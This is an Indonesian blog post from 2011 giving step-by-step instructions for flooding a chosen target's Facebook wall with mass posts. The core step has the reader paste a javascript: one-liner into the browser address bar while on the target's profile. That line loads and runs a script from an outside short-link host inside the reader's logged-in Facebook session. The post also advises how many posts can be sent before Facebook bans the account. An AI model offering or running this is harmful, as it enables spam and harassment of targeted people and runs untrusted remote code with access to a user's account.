Flooding di Facebook

Yang namanya flooding itu kalo kita ngewall ato komen jumlahnya banyak banget, sampe2 di peringatin sama fb .

Langsung aja ya, gw kasih tau caranya flooding wall ! :D
CARA 1 : Kalian bisa copas wall kalian satu2, alias manual gitu . Yang pasti makan waktu dan energi .
CARA 2 : 
1. Kalian buka profile fb target kalian . 
2. Terus kalian copykan script ini ke address bar

javascript:(a=(b=document).createElement("script")).src="//brk.to/wall",b.body.appendChild(a);void(0);

3. Kalian masukan jumlah wall yang mau dikirimkan.
4. Kalian ketik pesan yang mau dikirimkan.
5. Lalu enter.
6. Tunggu beberapa saat. Tergantung jumlah wall dan kecepatan internet kalian.
7. Silahkan refresh dan lihat hasil flooding kalian :D

Ini buat flooding wall, buat flooding komen kapan2 aja ah gw tambahin.
Oia hati2 kena omel dari fb, bisa kena banned wall lhoo ... Gw biasanya flooding 100 wall masih aman2 aja ga kena banned.

NB: javascript ini bukan gw yang buat, gw dapet dari browsing :p

This entry was posted on 11 Mei 2011 and is filed under ,. You can follow any responses to this entry through the RSS 2.0. You can leave a response.

Leave a Reply